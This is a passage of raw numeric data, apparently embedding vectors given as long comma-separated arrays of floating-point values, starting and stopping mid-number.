68131,0.018911174,0.011273628,0.006569577,0.009270357,-0.007542262,-0.015680773,0.04716479,-0.013661076,-0.006427003,0.009051216,0.0069760606,-0.012604453,0.020971531,-0.02029995,-0.010710465,0.007992419,-0.00052325486,-0.0130718425,0.0050480277,-0.012311429,0.009244063,-0.0028290488,0.004196615,-0.02306917,-0.038703285,-0.015125616,-0.09621685,0.015342503,0.012222853,0.001515237,0.028882077,-0.015203587,-0.004431824,-0.005515624,-0.018150687,0.022555795,-0.026684029,-0.018832112,-0.002522077,-0.00009662308,0.028259277,-0.012847884,-0.0041331146,0.0034490721,0.022651717,-0.019836266,-0.016072646,-0.012683826,-0.018776175,0.0006217764,0.013944093,0.0020657273,-0.0005869354,-0.013504269,0.014410006,-0.0021863517,-0.003343992,0.008408085,0.0017607845,-0.003152757,-0.010054092,0.0077250223,-0.021449935,0.008719812,0.012275155,-0.01709269,0.00012552834,0.0018764001,-0.0023383542,0.004448872,-0.026001371,0.019012477,-0.026066674,0.01050817,-0.0051293164,-0.022266781,0.008711088,0.0061896173,0.013033381,0.021429006,0.0019502068,0.010751057,0.009523519,0.0033259725,0.022002112,0.0009917632,-0.0069035357,0.010892646,0.011285214,-0.0048075,0.0037663807,0.007546913,-0.007622077,0.014456543,-0.01594675,0.0024834736,0.021791235,-0.022746155,0.014523375,-0.010113791,-0.008436805,0.01676888,0.0007165441,-0.015850069,-0.018810783,0.0048780716,0.025720293,-0.013363955,0.021033261,0.012875658,-0.010964332,0.00052060426,0.0016684617,0.0051505566,0.007993749,-0.01894892,0.0035399885,-0.0037848684,0.0044962573,-0.0033273913,0.011682553,0.010817828,-0.0032359392,0.011754365,-0.0069759362,0.0040612933,-0.017127419,0.002179918,-0.005248349,-0.0020622204,-0.0037097295,-0.010451098,-0.01918211,-0.007087344,-0.015048108,-0.014138353,-0.012257302,0.041424017,0.039620195,0.022006921,0.010824892,0.014889712,-0.006418724,0.017819174,-0.021603275,-0.0073346165,-0.019087572,0.0010008162,-0.01854692,0.027970692,0.027762879,0.004806003,0.013014262,0.008805329,-0.007723957,0.013581588,-0.000010928278,0.015977768,0.004958592,0.0071839853,-0.025234181,0.009310564,-0.014902847,0.029025543,0.001993814,0.029270628,0.003196659,-0.0027631633,0.0060965302,-0.0050021517,-0.013108383,0.006280469,0.013217842,-0.00089205086,0.01707616,-0.037416432,-0.0029536425,-0.0018114403,-0.016391268,0.011991025,-0.023517985,0.008252575,0.0033657383,0.024720026,-0.004663162,-0.021658396,0.0022680694,0.027516926,-0.005927488,-0.0021413672,-0.022937939,-0.0023440195,0.0031993792,0.0024916467,-0.022197813,0.012737349,-0.020827666,-0.02449423,0.01813715,-0.014932291,-0.00018532641,0.009298171,0.03617287,-0.0010206552,-0.012899295,0.0028836748,-0.03599644,-0.0074719344,-0.0002935733,-0.0049238517,-0.013253007,-0.008444178,-0.0028879396,0.00028253096,0.021401482,-0.0067587025,-0.004248059,-0.016001435,-0.020248583,-0.009301421,-0.0055005453,-0.004857395,0.0046802396,-0.010310809,-0.018537737,0.034025606,-0.0014115969,0.022853514,-0.015752828,0.025698947,0.025537545,0.008528573,-0.02020308,0.021476718,-0.030117756,-0.01115996,-0.0048528095,0.016103195,0.028496394,0.11762918,0.015653675,-0.00088801305,0.013160414,0.016463727,0.0078060916,0.0057968213,-0.011454046,0.00096023583,0.003781279,0.022945173,-0.01069608,0.011568499,-0.019556012,-0.0058209877,0.020946736,0.00988216,-0.030435497,0.017788442,0.018907504,0.011677552,-0.019859971,-0.0005451749,-0.051030036,-0.008413285,-0.058157746,0.027756626,0.02204884,0.013221526,0.0424534,0.0039378833,0.020703664,0.018728629,0.018890107,-0.009256639,0.00720536,0.012668529,-0.01891387,0.008675122,-0.0038802102,0.027031802,0.018024994,0.014096663,-0.009717438,-0.013223854,-0.019622218,0.00034414642,-0.014830924,0.008983951,0.0067428043,0.0031314434,-0.0021701534,0.009535843,0.0028810082,0.018744553,-0.018847639,0.0031962988,-0.0005089064,0.021021096,0.00097279303,0.019704439,0.0020927242,-0.000021114778,-0.012225791,0.004843271,0.0006612192,0.013638949,-0.0066876314,-0.005883636,-0.0007334095,0.016445791,-0.0015043691,0.0031889603,0.001358604,-0.0010365142,0.0067878794,-0.014902842,0.0075976457,0.015421874,0.0034815348,-0.0008874062,-0.008398543,0.006899435,0.010909287,-0.0019641386,0.00973816,-0.024518402,0.022652224,0.008804427,-0.012224448,-0.015879927,0.00029720255,0.015918676,0.018590607,0.002508748,-0.0026682767,0.014752964,-0.01078556,-0.0056853513,0.022032166,-0.013216344,-0.024809586,0.0031039072,0.01156807,0.00031001584,-0.015628673,0.00019494042,0.024689024,-0.0040036845,-0.0039133998,0.0038320324,0.008701925,-0.013219041,0.0030918582,0.012659443,0.05872823,-0.028115578,-0.017534943,0.017470129,-0.02040483,-0.007556153,0.0022959604,0.0063664876,0.03862736,0.013998536,0.011708934,-0.010687119,0.012580495,-0.0060949577,-0.0029862565,0.0059605846,-0.035794195,-0.0008497613,0.03367335,0.0013203183,0.02169177,0.0278419,-0.01882029,0.0018620724,0.0060677635,0.015810043,-0.00808455,-0.0025975073,0.021584705,0.012583551,-0.008207871,0.029800871,0.016233996,-0.0062660556,0.0043388116,0.0005957876,0.017883677,0.00060799404,-0.016411308,-0.009191108,-0.017946417,-0.013446835,0.006324414,-0.011312804,-0.019733382,0.00930365,0.0024748207,0.021972759,-0.03627896,0.000087517976,0.018372772,0.018026114,0.007595658,0.0021174082,0.019427812,-0.029589973,-0.018349346,0.021143453,0.014046368,-0.014379833,0.010556966,0.009170496,0.017549345,-0.000700299,0.01496892,-0.0051075094,0.016521724,-0.0075136074,-0.0026109216,-0.004416747,0.002170217,0.017852793,0.010623684,-0.02136944,0.011786354,-0.010986153,0.00626507,-0.010167908,0.008327748,-0.002213361,0.010159935,-0.019960731,0.031736504,-0.04039367,-0.031808782,-0.009667427,0.0040536467,0.007756741,-0.009649666,-0.0003852805,0.0036287047,0.011427507,-0.014652819,0.008155419,-0.026029516,0.019414995,-0.001955774,0.0036805084,-0.024760634,0.006532127,0.001962691,0.009836997,-0.018897118,-0.007459481,-0.009005959,0.011303967,-0.004307052,-0.0016846868,0.017244149,-0.028245296,0.00051709724,-0.006711016,0.013514068,0.010050902,-0.030436985,-0.005843514,0.005874499,-0.017795349,-0.015051303,-0.005643287,-0.005060974,0.016865745,0.01994565,0.018656608,0.024237618,0.004793934,0.0064460016,0.00044713804,-0.0023372804,-0.021079015,0.0034060262,-0.009702653,-0.015347064,-0.0001649452,-0.00090861786,-0.019959668,-0.008501645,-0.007809948,-0.00041956373,-0.016792748,-0.00168827,-0.004084589,0.025487317,0.027709391,-0.011366796,0.017117111,0.019829769,0.0025428731,0.025226265,0.001981143,-0.019797152,0.0016777866,0.0015344642,-0.0037320775,-0.0038561446,-0.009703182,0.011399143,-0.013719713,0.0179667,0.0028278742,0.0048703076,-0.016023383,-0.0062756916,0.012797994,0.009366858,-0.00456081,-0.02416394,-0.016620276,-0.012386579,0.0040410752,-0.020153144,0.005941033,-0.013464255,0.07005185,-0.040121254,-0.0027515802,0.017259773,-0.022785487,-0.01955507,0.022260478,0.004999839,-0.03213883,-0.027440457,0.013831188,-0.015274432,-0.0031478824,-0.026355201,0.0019268807,-0.0136343725,-0.020891227,0.012785676,0.010700249,-0.008786245,-0.0148046035,0.013317033,-0.004151559,-0.0054637115,-0.013308976,0.0063675856,-0.0118818935,-0.009651715,-0.015018153,-0.00013137606,0.020700997,0.011293837,0.02312267,-0.03345242,-0.0020937063,0.018406684,-0.0045597493,0.020809965,0.014231797,-0.03353853,-0.022402981,-0.015925977,0.007824852,-0.009300966,-0.004233423,-0.024878921,-0.01510229,0.01190148,-0.00008542013,0.14822502,-0.019520635,0.0047782343,-0.009715741,0.0027290697,-0.011807237,0.018519742,0.03234801,0.00029668075,0.030797223,0.0154067315,-0.009060581,-0.0034176789,0.026664574,0.0020875602,-0.012341741,0.017745603,0.17129755,0.0038227898,0.018777223,-0.0012072901,0.0048365663,-0.011350898,0.006678055,0.024022501,-0.06135591,-0.016071692,-0.014905491,-0.009078046,-0.00095059536,-0.032325137,0.026268559,-0.003727464,0.00352712,-0.0063162996,-0.0020267,0.0059162835,0.00578258,-0.015295748,0.0022277962,0.022891259,0.0022480527,-0.0028073187,-0.012914681,-0.015323252,-0.00028123564,-0.02699909,-0.013823989,-0.004398797,0.031534303,0.0035268674,-0.032811336,0.0017007953,0.02031138,0.020318663,-0.0064647985,0.021764562,0.00066003716,-0.051122297,0.024090787,-0.0022666964,0.024460165,-0.0065890225,0.03590773,0.008026202,-0.0020471443,-0.021739718,0.006373796,-0.0009973571,0.028747847,0.0044903695,0.0016844732,-0.011228021,-0.0026638147,0.032100283,0.015641764,-0.02827199,0.009539381,0.0114778,-0.0081054475,0.014413938,0.006095189,-0.017692726,0.0009408092,0.0034182093,0.0032471018,-0.010707775,-0.00939645,0.007822805,-0.020086486,-0.019524192,0.005414885,-0.0036898756,-0.002129061,0.005577796,0.024819434,0.006012485,-0.0039021093,-0.0021641871,-0.008021637,-0.001226834,0.017885264,-0.007039446,-0.009511185,0.015672185,0.015864914,-0.02756319,-0.021258907,0.007031483,0.0038523553,0.005862769,-0.0044343844,-0.0114570055,0.0067484444,0.0099647,-0.0028637713,-0.003289458,-0.008059991,-0.047517005,0.01207304,-0.006368522,-0.0016577939,0.003519702,0.0032534215,-0.014673242,0.01739784,0.036168575,0.0019611586,-0.025732674,0.0036849633,-0.008437569,0.005706346,-0.020678459,0.042356417,0.0015794766,-0.0035828236,0.0021823787,-0.04251405,-0.012978213,-0.0040935352,0.0066830516,0.017821796,-0.0003984707,-0.0021575491,-0.008716761,-0.014935638,0.013296586,0.0036857924],[-0.0021544213,0.020944713,-0.019727224,-0.00988045,0.0031769623,-0.014727543,-0.027119193,0.032495465,0.0071235853,-0.017585197,0.011060195,0.009368685,-0.0029606032,-0.02255893,-0.017118037,0.0015944001,0.0045393337,0.008424682,0.011602085,-0.0166013,0.00556714,-0.0020352027,0.01024279,-0.012577191,0.019136166,-0.0030985104,0.00009280223,-0.0002562486,0.0031071694,0.005245702,-0.010762155,0.020253377,-0.0016193356,0.01759287,0.0017273242,-0.008871356,-0.02606901,-0.021129442,0.011345664,-0.0066369534,0.0003804691,0.015001924,0.0121890735,0.014272798,0.0013922431,-0.004881704,-0.020807452,-0.006439009,-0.031545803,0.00836382,0.021592157,-0.0115658585,-0.038633555,0.029875202,-0.030793844,0.025868487,-0.0000860215,-0.028489718,0.0138593875,-0.0017075159,-0.018528473,0.0165477,0.0112689445,-0.023567695,0.014506256,-0.015456664,-0.0017755711,-0.019519702,0.013583472,-0.018406112,-0.024347473,0.00033388645,-0.0037775883,0.005535113,0.00018142219,0.0060544787,0.021705382,-0.006811973,-0.01346041,0.0023154179,-0.0062058102,0.020939553,-0.008107255,-0.008712003,-0.0012079775,0.012511777,0.0025736175,0.0032011117,-0.013767188,-0.022273974,-0.021569695,0.0053543104,0.035557844,0.01128385,-0.0073738014,0.015703067,0.007822355,-0.005612025,-0.014679319,0.0023789834,-0.011618835,-0.021828385,-0.013735367,-0.0007743117,0.001448999,-0.007279934,-0.002618807,-0.019552024,0.010980221,-0.010280025,0.0037696648,0.012091618,0.0041489485,0.014362,0.007076364,0.012533308,-0.009517308,0.017023597,0.0017787678,-0.005462249,0.00864972,0.030868819,0.011978919,0.022822995,-0.0029282293,0.0020842853,-0.016589176,0.006839674,0.0023577425,0.013766232,0.0036024333,-0.00095640135,-0.017747603,-0.0089275455,-0.011665778,-0.0030471259,0.0027004597,-0.010323555,0.013973447,0.0014719862,0.021951215,-0.010604843,-0.0023542456,0.013625486,0.03182884,0.023164812,-0.0028963187,0.016953884,0.023312692,0.012520054,0.010755789,-0.021640478,0.00015253201,-0.009306242,-0.0037583068,0.034646064,0.008346885,-0.014651391,-0.019870874,0.008003328,-0.013319255,0.0026624699,0.019170973,-0.010660332,-0.0026959036,-0.045845676,0.007889481,-0.009874963,-0.019491155,0.014278922,0.01852705,0.0044134096,0.023338513,-0.009013201,0.0050928267,0.030147478,-0.018907469,-0.011535907,-0.008390974,-0.007562155,0.011774473,0.012796005,0.008704598,0.004693394,-0.005238068,0.013991053,0.021981893,-0.00056325464,-0.022376787,-0.017048402,-0.003914747,-0.022856396,0.009637363,-0.0012336657,-0.005478568,-0.009632599,-0.0022044545,0.07552079,0.0089136595,0.0032840208,-0.011811205,-0.0063557643,0.006174811,-0.033689737,0.0029380773,0.0075360984,0.011749245,-0.022300735,0.026153103,0.0026653705,-0.00059679366,0.005117125,-0.010697572,0.021167438,0.010850395,-0.050035898,0.026626652,0.014473451,0.013701048,0.010563149,-0.015136884,0.0047214283,0.00969879,-0.015009008,0.01098479,0.0071794665,-0.01021645,0.009530013,0.017606905,-0.01761193,0.0052519934,0.00079879956,-0.026344426,0.0025231533,0.027457671,-0.029055094,0.007042553,0.008151925,0.014975328,-0.0072014425,0.009800203,0.011572393,0.036869854,0.030699508,-0.013119198,0.00038763575,0.0151973255,0.0038022648,-0.01248926,0.0307668,0.03536937,-0.003721889,0.022542903,0.030917209,-0.0029394682,-0.0154975485,-0.0043677674,-0.019427648,0.009047965,0.0052363826,0.01800815,0.026082486,-0.00871153,0.02249671,0.02939069,-0.002319955,-0.005245588,-0.024354488,-0.0061328346,-0.009624356,-0.021035872,0.009450311,-0.02140159,-0.0054154173,0.0034897258,0.00078268547,0.016645534,0.009689818,0.0016489907,-0.0028263356,-0.0075530247,0.007275906,-0.008593927,-0.011248474,-0.0071464106,0.0065665036,0.0053629437,0.0057432638,0.043521393,-0.007712275,0.002585415,-0.012039113,0.011375638,-0.01931196,-0.03067753,0.0025108587,0.00089575606,0.0031682847,-0.0006181039,-0.02751155,-0.0029022426,-0.02017752,0.028962858,0.0026671896,-0.0064325863,0.006338655,-0.009776092,0.037020512,-0.036862046,0.017397936,-0.025845483,-0.0064916257,-0.012642759,0.008082204,0.0061089634,0.0032732885,-0.0043239607,-0.0063167294,-0.012526692,-0.0033362955,0.019685535,-0.021476008,0.008802333,-0.018836878,-0.009100756,0.001462409,-0.0015141072,-0.011430167,0.02062458,0.0031921847,-0.013372485,0.013823795,0.008449448,0.021077042,-0.009165268,0.02154045,-0.015667362,0.02214983,-0.0144088045,0.0069320705,-0.028912773,-0.015621289,0.0009974777,0.009887411,-0.005258916,-0.011670562,-0.009468988,0.0040635713,0.010359247,0.009502674,0.0059748464,-0.0027171518,0.00870782,-0.012231463,-0.014657064,-0.007321266,-0.02372583,-0.020325655,0.010458724,-0.008557064,0.017227259,-0.007210786,-0.014456557,0.0037665986,0.059563756,-0.004126341,0.009624999,0.01043006,-0.0051870267,0.011324464,0.0067392257,-0.02347393,0.010659406,0.010487622,-0.010379577,-0.018535508,0.011653776,0.00991163,-0.015401698,-0.0036171207,-0.008672641,0.005195284,-0.028323272,-0.022787983,0.0042299232,-0.009356802,-0.016944198,0.020302169,0.014840352,0.012777786,0.007937914,-0.011464777,0.008352851,-0.0050002704,-0.010908826,-0.0044191014,0.010492234,0.009655752,-0.036747627,0.019897794,-0.0030056366,-0.0065904795,-0.0010541423,-0.006216734,-0.0007634526,-0.0043794475,-0.0026944194,-0.01721052,-0.018548528,0.010514247,0.0034291612,-0.01798922,-0.03150861,0.0057338807,0.0021997392,0.02185812,-0.0158762,0.013519086,0.002139765,-0.008863911,0.030988226,-0.035997547,0.026564848,0.03727503,0.030882725,0.028974015,-0.009987424,-0.0068385853,-0.0021429728,0.033346985,-0.025785018,-0.011640251,0.014668504,-0.008932418,0.0060299616,-0.000718506,-0.0123906145,0.005793826,-0.01774659,0.0181984,-0.0026742304,-0.01546062,0.012626838,0.025446882,-0.00074821565,-0.0071235523,-0.009162019,-0.0017056277,0.0023804377,0.011720672,0.006033841,0.030265264,0.010474872,-0.0033412946,-0.0109382,0.012945724,0.001965401,0.011180348,0.03384145,0.0067936047,0.009252519,0.017678993,-0.018866623,0.0014779739,0.010755488,-0.016942173,-0.0017139717,-0.0237469,0.009329254,0.024698703,0.01302148,0.00605094,-0.00520267,0.029641325,-0.0203153,0.004299537,0.03557902,-0.014542245,0.0041695046,-0.0009586455,-0.0076848683,-0.0062132585,-0.004128885,0.0072527565,0.0398693,0.0010280432,0.02820652,0.00927847,-0.02128049,0.0023073838,0.0016605315,-0.02965688,0.020757588,0.019358195,0.014011975,0.035528947,0.012018767,-0.05159507,0.007584841,-0.012430183,-0.03443932,-0.034581855,0.017523253,0.020295288,0.023022294,0.03535814,0.04438539,-0.0016458803,0.0019335794,0.013452487,0.04847621,0.0029186779,-0.016627725,-0.01690966,-0.012933193,-0.0038797217,-0.012629594,-0.0053404574,-0.0028756189,0.011380887,0.016088085,-0.008443492,-0.010251263,0.018829131,0.021112742,-0.018471444,-0.005582832,0.0055301054,-0.0003347551,0.018506832,0.0027152223,0.038701493,0.0019986855,-0.009743928,-0.021738937,-0.0031046045,0.009071228,-0.014654923,0.011543565,-0.029057242,0.011658511,-0.010575306,0.015069568,-0.0076955697,0.028430603,-0.022906002,0.0043195942,0.002346898,0.0020763306,-0.009586793,-0.0037105046,-0.0047365096,-0.009142757,-0.0054937876,-0.03645794,-0.019335484,0.022887075,0.023670798,0.0015888652,-0.02712279,-0.014370488,-0.023077337,-0.00083394925,0.011376235,-0.0029856588,0.014359769,0.0030364408,0.015090529,-0.015682459,0.004302467,0.024807874,-0.0026305388,0.002963866,-0.007097375,0.0064206957,0.029128456,0.009657479,0.017311763,0.023199474,0.02641531,-0.008259166,0.00015302378,0.052492466,0.017362813,0.012425168,-0.0285683,0.005726426,0.0076313666,0.0022578696,-0.017597934,0.0050345934,-0.00451363,-0.0033665719,-0.026181038,-0.011975854,-0.018190978,-0.014192078,-0.00053155376,-0.009805203,-0.008319867,-0.031482376,-0.011062243,0.009803855,-0.018474419,-0.004758265,0.016958231,-0.0009409975,-0.012810619,-0.0044356664,0.011109976,-0.012783823,-0.002181215,0.0053283884,-0.010034512,0.000365977,0.0148305725,0.018326137,-0.015393861,-0.018112,-0.014558682,-0.016984759,0.00008121396,-0.022916602,0.028406825,0.032126077,0.0017160398,-0.0050680432,-0.03347393,-0.020997485,-0.006291307,0.008807075,-0.030081708,-0.009539482,-0.009084604,0.013848501,-0.015283242,0.00411005,0.01607815,-0.022078719,0.0024857293,0.009433764,-0.0011094179,-0.043933313,-0.0073448247,-0.01750994,-0.010111571,0.0010840093,0.05697136,0.0106259845,0.007454103,-0.0033835275,-0.022162415,-0.002037541,-0.017518435,0.000089187335,-0.0033915965,0.0052829334,-0.011552138,-0.036795735,-0.019473493,-0.007617429,-0.03677349,-0.016330052,0.0362565,0.01797609,0.0011106762,0.0005390154,-0.0114828795,0.0045163054,-0.015362279,-0.01578874,-0.0482459,-0.0029410562,0.016544146,-0.021278208,0.0030109417,-0.00679673,-0.01631735,-0.016016321,-0.013887057,-0.0063192253,0.0031846217,0.009918326,-0.005997444,-0.013624467,0.017451694,-0.018948352,0.029556151,-0.0040260646,0.007846293,0.01339804,0.030383553,-0.00014464208,0.015738072,-0.0071218074,0.011361487,-0.023448512,0.016591964,-0.001819579,0.013782466,0.012447987,0.011533291,0.008135927,0.014318838,0.0069692433,-0.005619556,0.00891798,0.017779408,0.013827985,-0.0027291027,0.019688854,-0.0044158967,0.04026778,0.008562219,0.0037272382,-0.00064298254,0.022360861,0.007683144,0.015355059,0.02192872,0.005381148,0.022046888,-0.027725516,-0.020634467,-0.004869805,0.023518704,0.015701998,0.02063848,-0.017009389,0.011646469,0.005110637,0.007858579,-0.013871045,-0.009596029,-0.013312882,-0.026001468,0.0043231347,-0.020117365,-0.0010145518,-0.045276657,-0.0065545426,0.0051710536,0.016281098,-0.0061794342,-0.027651936,-0.0019987454,0.026032202,-0.0020578618,-0.031518247,-0.051035784,-0.0010663235,0.03568683,-0.0028925154,-0.004038026,0.029189877,0.0046645314,0.005319368,0.027147526,-0.021198949,-0.02590656,0.0015102501,-0.02278446,0.018038396,0.0024575444,0.013251958,-0.0001603481,-0.011558879,-0.021628566,-0.010732837,0.0010891083,0.0060354904,0.0076458063,0.028475672,0.0038914708,-0.008740763,0.004020529,-0.029131025,-0.010997578,-0.016290886,-0.05298326,0.0003223756,-0.023703432,0.03326289,-0.019329296,0.01858276,-0.017278174,0.040897075,0.012444753,-0.015187339,0.0133453235,0.012096539,0.02264728,0.031990126,0.019234207,0.021839213,-0.030997481,0.00818506,0.031303637,-0.018410727,-0.015464928,-0.013757121,-0.007819662,-0.020798111,-0.033597905,0.0147366095,-0.019692924,0.011470919,0.0049463143,-0.01591932,0.025876448,-0.018398141,0.025511928,-0.015146205,0.021816371,0.009390385,-0.01563459,0.0054362826,-0.026711125,-0.010830488,0.019081594,-0.00009220134,0.0075054313,0.0115899695,-0.030106168,-0.04551076,-0.0130737005,0.005853301,-0.022675848,0.017889429,-0.006365979,-0.0011941484,-0.013879125,0.024143448,-0.005029438,0.03316051,-0.015896315,0.0047986135,0.010438934,0.0028598541,0.014757626,0.016443131,-0.0067079174,0.014026383,0.03036512,-0.008050942,0.019302335,-0.0063101673,0.017452018,-0.010166199,0.014603013,-0.0009549635,0.007551457,0.012993263,-0.021545341,-0.014157799,0.010347272,0.0017875693,-0.0012851926,0.0031184007,-0.05176695,-0.0112421755,0.0046592704,0.005843747,0.008784171,0.0273537,0.009847951,-0.021259269,-0.0066753114,-0.011831704,0.0075271367,0.0022023893,0.019082505,0.021220006,0.0059830016,-0.027708424,0.00572113,-0.0031281488,-0.008458387,-0.0065067047,0.008312754,-0.010303839,0.004110888,0.032225527,-0.009205349,0.007084191,0.02030827,-0.011702632,0.01500436,0.01561281,0.016877487,-0.005768769,0.03662569,0.026276998,-0.02566697,-0.006496224,-0.010684595,-0.005948573,0.014687835,-0.021382991,0.00398666,-0.011690074,0.0000953247,0.007376303,-0.005630422,0.0028435208,0.004200759,-0.0031593684,-0.020138115,0.009988221,0.008587955,-0.020308305,0.00626214,0.01983992,0.0087892,-0.00971278,0.007188137,-0.02114259,-0.01080449,0.0041107996,0.0019552524,-0.011362717,0.01048276,0.011718354,0.015501881,0.037761834,-0.0034998856,0.0052438905,-0.025577072,-0.034504782,0.0121924635,0.01173435,-0.01851837,-0.014336465,0.0047112983,0.019356774,0.0022511021,-0.019553341,-0.018862769,-0.072475664,0.023174763,-0.01327117,-0.0133829685,0.007662945,0.002439795,0.0060203304,-0.019731004,0.02736445,-0.018204847,0.004082868,-0.016554097,0.017775277,0.008645012,-0.010004734,-0.022459712,-0.014776224,0.0016879535,0.019919962,0.02375832,-0.006292175,0.016263217,0.004073849,0.00016685657,0.028273562,-0.005973114,-0.016608328,-0.018685725,-0.0493227,-0.023552982,0.0030949651,0.004000105,-0.01822193,0.0045394036,-0.019994799,0.0068004252,0.006738303,0.014020809,-0.0115360655,0.005024824,0.008354916,-0.010904006,-0.009316268,0.0378314,-0.012975771,-0.025318353,0.005646469,0.0015541534,0.014153084,-0.002910819,0.00932631,-0.006121676,0.00013363057,0.011240374,-0.014011453,0.040023558,-0.008015344,0.019761285,0.0034472954,0.021026768,0.0070338873,-0.012095113,0.017289264,0.021723852,-0.018480228,0.0015882712,-0.010966402,0.023104416,0.018431326,-0.015134838,-0.02014905,-0.02760858,-0.021182852,-0.0022582456,-0.002204104,0.024962883,-0.018740358,0.007281515,-0.0018617582,-0.026173957,-0.009325557,0.029614538,-0.036353532,-0.0037482993,-0.007822692,0.0025371262,0.009920087,-0.0037540155,0.0043253815,-0.006365088,-0.020637034,0.010534444,-0.003082619,0.0054827663,-0.0045212894,0.04020021,0.0015062729,-0.00210611,-0.00071555737,0.008519463,0.01574515,-0.005007766,-0.0032242627,0.064299606,0.009721707,0.0013081371,-0.0012868185,0.009842597,0.012321799,0.0135048935,0.016865965,0.00013525863,-0.007534806,0.0021962519,0.013476066,0.0075197727,0.0035336744,0.021655185,0.023713987,0.011082426,-0.0007133774,-0.009210917,0.009231894,0.009537556,-0.004985252,0.0041057593,0.0042380393,0.014821927,-0.016410118,-0.0018443802,-0.009537517,0.02851916,-0.007831838,-0.0073138075,0.016525362,0.012396493,0.016109504,-0.042529516,-0.0033461691,0.0019633875,-0.0076107965,-0.0016622235,-0.008005291,-0.008439275,0.017188888,-0.020144438,0.026897632,-0.008795409,0.018840518,-0.002852621,0.000825399,-0.0005849893,0.008910618,0.008020512,-0.0035799923,-0.015800698,-0.0141611295,0.0025171875,0.026539007,0.0024106472,-0.019927705,0.0066355453,0.007747837,-0.0012291457,-0.034638286,-0.00025690548,-0.013764009,0.0020086863,-0.029892957,0.012062326,-0.0018985558,0.030446846,0.0023525793,0.0068023913,-0.005845849,-0.019714208,0.015614386,0.0085925395,0.0048100227,0.010144439,-0.01454543,0.029407764,0.004148567,-0.013500574,0.011328755,-0.0011065014,-0.017844306,0.0038249667,-0.0073817717,-0.024289984,-0.003909859,-0.0065899566,0.012161684,0.00817474,-0.022267021,0.039873138,-0.011705995,0.016911203,0.015058983,-0.012935072,-0.008360734,0.03153605,-0.0042657536,0.013666259,-0.034572657,-0.002773346,-0.0059121284,-0.03924445,-0.018508906,-0.003118147,-0.01627791,-0.006913287,-0.03288843,0.002280106,-0.0039467807,0.008029975,-0.020874137,0.008631918,0.009919947,-0.005216308,0.006965915,-0.0000061289647,0.015160096,0.024658753,-0.011991366,-0.02301988,0.013953195,0.01295036,-0.016348721,-0.004263333,0.03519566,-0.015384007,0.020388966,0.020319898,-0.01291945,0.000818287,0.008624613,-0.0051837508,-0.033622384,-0.0032030575,0.005843844,0.014211946,0.00842291,-0.0056397375,0.0030060066,0.024772681,0.0045154383,0.0035135413,0.0103844525,0.01853614,0.012650322,-0.01789702,0.016152982,0.0023328064,-0.020331906,-0.0017500144,-0.018762294,-0.0045417594,-0.008242779,-0.0030320385,-0.0188426,-0.013657895,-0.00092149765,-0.01582792,-0.008590959,0.0008074535,0.0006245321,-0.0012136146,0.025850398,0.011887879,0.0036672922,0.013127235,-0.018688243,-0.0037300037,-0.020707563,0.016369935,-0.0046326774,-0.0055024624,0.009460759,0.028882045,-0.008858019,0.006969726,-0.002610575,-0.017080864,0.018197345,0.018461809,-0.0117018195,-0.014712159,0.01513942,-0.0074291145,-0.018404512,-0.029805208,0.005920217,0.011207621,0.008506989,0.0069698323,4.0180805e-7,0.0041018333,-0.017243316,-0.015642263,0.07637433,-0.0071915267,0.00503731,-0.0009109307,0.011647199,-0.0146940965,0.011222951,0.004682132,-0.0033646517,-0.023238732,-0.01334874,-0.017376399,-0.010054371,0.008039725,0.024659703,0.002191712,-0.0140959285,0.013964447,0.008522208,0.020548623,0.0073014107,-0.002810681,-0.032046672,-0.0015565137,0.011552057,0.018884817,0.020679796,-0.012353428,0.0013933209,0.018264482,-0.00012976977,-0.030061996,0.03505323,0.015139298,-0.020265251,0.0091946535,0.0057104737,-0.006504229,-0.015401731,0.010520321,-0.0008696969,-0.018291282,0.049690768,0.016693452,0.00032440337,-0.01320267,-0.02025825,0.004564292,-0.009920005,-0.03834448,-0.0039713243,0.012177315,-0.014127995,0.009072387,-0.014369597,0.00447408,-0.013600105,0.03810782,0.014035257,-0.008254217,-0.002934951,0.03012137,0.0044331416,-0.02609151,-0.013240377,-0.01422227,-0.015272764,-0.0036611392,-0.0018348867,-0.018348001,-0.020061411,-0.0052399724,-0.008645568,-0.0071789315,0.00048008675,0.0078004524,0.016915243,-0.013478064,-0.008980689,-0.017000107,-0.020124378,-0.014092212,0.01948242,0.008753512,-0.0146527,0.016593555,0.015978584,-0.0083634285,0.024372071,0.01244919,0.015274756,0.006189788,0.004716279,0.018220821,0.023139978,0.021070968,-0.014317211,-0.0017665996,-0.018143825,0.015906436,-0.0004843811,-0.0025187633,0.021206941,-0.0046980795,0.012371979,-0.016097704,0.0075831437,-0.01277767,0.008956056,0.02206571,0.015888399,0.0010713742,-0.005107351,0.0049391505,-0.0056812726,0.0020519209,-0.0064229527,-0.022552824,-0.0053180438,-0.011868452,0.012582648,-0.0033908107,-0.019532384,-0.0528989,0.01201571,0.13037725,-0.010276479,-0.010966657,0.019623071,0.0075789667,0.00940779,-0.15171033,0.0107710725,-0.009190781,0.0015624107,0.0032995117,-0.010847515,-0.011276313,0.013832387,0.0055424822,0.0075923805,-0.004603522,-0.028550167,0.02366014,-0.010306363,0.00094168674,0.011596639,-0.012765345,0.004328983,-0.03517296,-0.017173324,0.018462814,-0.0037594885,0.008346496,-0.023736535,-0.0045955204,-0.007679948,0.0061751255,0.005571094,-0.010814966,0.008073099,0.016797826,0.020169938,-0.028208755,0.002848845,0.023089834,0.007303107,-0.023615083,-0.03876649,-0.14650065,0.005098667,-0.010698519,-0.018415663,0.0048385444,-0.0040700557,-0.008278262,0.0004890444,0.0113291275,-0.014516525,0.015540882,0.03843371,-0.015449998,0.004269406,-0.016122246,0.005652285,0.0023665493,0.011941999,0.0022588572,-0.00011489959,0.006526033,0.0021292213,-0.024410496,-0.019902216,-0.016205208,0.016111461,0.021230726,0.018437508,0.0052316184,0.009420559,-0.0014448608,0.0126195215,-0.020997362,0.022889355,-0.002673682,0.002492015,-0.00689499,0.009876186,0.0007484898,0.025996737,0.0047630803,0.0023649468,-0.009983955,-0.018187659,-0.0057216124,0.0040255473,0.0061974768,-0.0025916738,0.007891103,-0.012122314,0.0020436724,0.0114105,-0.01901731,0.016779952,0.0056966734,-0.003913639,-0.013960123,-0.023266884,-0.019716641,-0.00399119,-0.014625978,-0.015655516,-0.023264965,-0.0018444672,0.038444884,-0.0270983,0.026448475,-0.014733433,-0.006515609,-0.0037900254,0.0033210358,-0.00034364365,0.017964823,-0.018535035,0.020647224,0.00736741,-0.006767604,-0.0018315398,0.01594131,-0.003497969,0.028325737,-0.005481595,-0.009517039,-0.006665